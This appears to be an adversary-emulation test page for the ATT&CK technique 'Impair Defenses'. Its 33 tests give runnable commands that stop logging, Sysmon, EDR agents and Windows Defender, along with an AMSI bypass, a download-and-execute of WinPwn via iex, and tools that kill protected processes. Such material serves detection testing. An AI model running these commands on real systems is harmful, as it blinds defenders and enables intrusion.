T1562.001
Impair Defenses: Disable or Modify Tools
Description from ATT&CK
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to Indicator Blocking, adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. Exploitation for Privilege Escalation), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
Atomic Tests
Atomic Test #1 - Disable syslog
Disables syslog collection
Supported Platforms: linux
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
Inputs:
Name | Description | Type | Default Value | |||
---|---|---|---|---|---|---|
package_checker | Package checking command for linux. | string | (rpm -q rsyslog 2>&1 >/dev/null) | (dpkg -s rsyslog | grep -q installed) | |
package_installer | Package installer command for linux. Default yum | string | (which yum && yum -y install epel-release rsyslog) | (which apt-get && apt-get install -y rsyslog) | ||
flavor_command | Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog | string | systemctl stop rsyslog ; systemctl disable rsyslog | |||
cleanup_command | Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on | string | systemctl start rsyslog ; systemctl enable rsyslog |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
#{flavor_command}
Cleanup Commands:
1
#{cleanup_command}
Dependencies: Run with sh!
Description: Package with rsyslog must be on system
Check Prereq Commands:
1
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
Get Prereq Commands:
1
sudo #{package_installer}
Atomic Test #2 - Disable syslog (freebsd)
Disables syslog collection
Supported Platforms: linux
auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
service syslogd stop
sysrc syslogd_enable="NO"
Cleanup Commands:
1
2
sysrc syslogd_enable="YES"
service syslogd start
Atomic Test #3 - Disable Cb Response
Disable the Cb Response service
Supported Platforms: linux
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
Inputs:
None
Attack Commands: Run with sh!
1
2
3
4
5
6
7
8
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
Atomic Test #4 - Disable SELinux
Disables SELinux enforcement
Supported Platforms: linux
auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
setenforce 0
Cleanup Commands:
1
setenforce 1
Dependencies: Run with sh!
Description: SELinux must be installed
Check Prereq Commands:
1
which setenforce
Get Prereq Commands:
1
echo "SELinux is not installed"; exit 1
Atomic Test #5 - Stop Crowdstrike Falcon on Linux
Stop and disable Crowdstrike Falcon on Linux
Supported Platforms: linux
auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
Cleanup Commands:
1
2
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
Atomic Test #6 - Disable Carbon Black Response
Disables Carbon Black Response
Supported Platforms: macos
auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
Cleanup Commands:
1
2
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
Atomic Test #7 - Disable LittleSnitch
Disables LittleSnitch
Supported Platforms: macos
auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
Cleanup Commands:
1
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
Atomic Test #8 - Disable OpenDNS Umbrella
Disables OpenDNS Umbrella
Supported Platforms: macos
auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Cleanup Commands:
1
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Atomic Test #9 - Disable macOS Gatekeeper
Disables macOS Gatekeeper
Supported Platforms: macos
auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
sudo spctl --master-disable
Cleanup Commands:
1
sudo spctl --master-enable
Atomic Test #10 - Stop and unload Crowdstrike Falcon on macOS
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
Supported Platforms: macos
auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist |
userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
Cleanup Commands:
1
2
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}
Atomic Test #11 - Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
Supported Platforms: windows
auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
fltmc.exe unload #{sysmon_driver}
Cleanup Commands:
1
2
3
4
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i > nul 2>&1
Dependencies: Run with powershell!
Description: Sysmon must be downloaded
Check Prereq Commands:
1
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr /i Sysmon 2> nul") -or (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe")) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sysmon" -Force
Description: sysmon must be Installed
Check Prereq Commands:
1
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i}
Description: sysmon filter must be loaded
Check Prereq Commands:
1
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
4
5
6
7
if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i
}else{
sysmon -u
sysmon -accepteula -i
}
Atomic Test #12 - Uninstall Sysmon
Uninstall Sysinternals Sysmon for Defense Evasion
Supported Platforms: windows
auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
sysmon -u
Cleanup Commands:
1
sysmon -i -accepteula >nul 2>&1
Dependencies: Run with powershell!
Description: Sysmon executable must be available
Check Prereq Commands:
1
if(cmd /c where sysmon) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
5
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
Description: Sysmon must be installed
Check Prereq Commands:
1
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
Get Prereq Commands:
1
cmd /c sysmon -i -accepteula
Atomic Test #13 - AMSI Bypass - AMSI InitFailed
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Supported Platforms: windows
auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd
Inputs:
None
Attack Commands: Run with powershell!
1
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Cleanup Commands:
1
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
Supported Platforms: windows
auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Cleanup Commands:
1
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
Atomic Test #15 - Disable Arbitrary Security Windows Service
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
Supported Platforms: windows
auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to stop | string | McAfeeDLPAgentService |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
Cleanup Commands:
1
2
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.
Supported Platforms: windows
auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
Cleanup Commands:
1
2
3
4
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
Atomic Test #17 - Tamper with Windows Defender Command Prompt
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.
Supported Platforms: windows
auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
Cleanup Commands:
1
2
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
Atomic Test #18 - Tamper with Windows Defender Registry
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.
Supported Platforms: windows
auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
Cleanup Commands:
1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
Atomic Test #19 - Disable Microsoft Office Security Features
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: windows
auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
Cleanup Commands:
1
2
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
Atomic Test #20 - Remove Windows Defender Definition Files
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: windows
auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
Supported Platforms: windows
auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to remove | string | McAfeeDLPAgentService |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
Supported Platforms: windows
auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Folder
Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
Supported Platforms: windows
auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
excluded_folder | This folder will be excluded from scanning | path | C:\Temp |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath
Cleanup Commands:
1
2
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Extension
Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
Supported Platforms: windows
auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
excluded_exts | A list of extension to exclude from scanning | string | .exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension $excludedExts
Cleanup Commands:
1
2
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
Atomic Test #25 - Tamper with Windows Defender Evade Scanning -Process
Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
Supported Platforms: windows
auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
excluded_process | A list of processes to exclude from scanning | string | outlook.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess
Cleanup Commands:
1
2
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess
Atomic Test #26 - office-365-Disable-AntiPhishRule
Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
Supported Platforms: office-365
auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | office-365 username | string | None |
password | office-365 password | string | None |
Attack Commands: Run with powershell!
1
2
3
4
5
6
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
Cleanup Commands:
1
2
3
4
5
6
7
8
if("#{password}" -ne "") {
$secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
}
Dependencies: Run with powershell!
Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
Atomic Test #27 - Disable Windows Defender with DISM
The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. This method will remove Defender and it's package.
Supported Platforms: windows
auto_generated_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
Atomic Test #28 - Disable Defender Using NirSoft AdvancedRun
Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign. See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
Supported Platforms: windows
auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
AdvancedRun_Location | Path of Advanced Run executable | path | PathToAtomicsFolder..\ExternalPayloads\AdvancedRun.exe |
delete_defender_folder | Set to 1 to also delete the Windows Defender folder | integer | 0 |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(#{delete_defender_folder}){
$CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}
Cleanup Commands:
1
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
Dependencies: Run with powershell!
Description: Advancedrun.exe must exist at #{AdvancedRun_Location}
Check Prereq Commands:
1
if(Test-Path -Path "#{AdvancedRun_Location}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
Atomic Test #29 - Kill antimalware protected processes using Backstab
Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill. https://github.com/Yaxser/Backstab
Supported Platforms: windows
auto_generated_guid: 24a12b91-05a7-4deb-8d7f-035fa98591bc
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
process_name | Name of the protected process you want to kill/terminate. | string | MsMpEng.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
& "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" -k -n #{process_name}
Dependencies: Run with powershell!
Description: Backstab64.exe should exist in ExtrnalPayloads Directory Check Prereq Commands:
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
Atomic Test #30 - WinPwn - Kill the event log services for stealth
Kill the event log services for stealth via function of WinPwn
Supported Platforms: windows
auto_generated_guid: 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive
Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell
Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled in Windows settings.
Supported Platforms: windows
auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
Cleanup Commands:
1
2
3
4
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
Atomic Test #32 - LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
LockBit Black - Disable Privacy Settings Experience Using Registry
Supported Platforms: windows
auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f
Cleanup Commands:
1
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
Atomic Test #33 - LockBit Black - Use Registry Editor to turn on automatic logon -cmd
LockBit Black - Use Registry Editor to turn on automatic logon
Supported Platforms: windows
auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
4
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
Cleanup Commands:
1
2
3
4
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
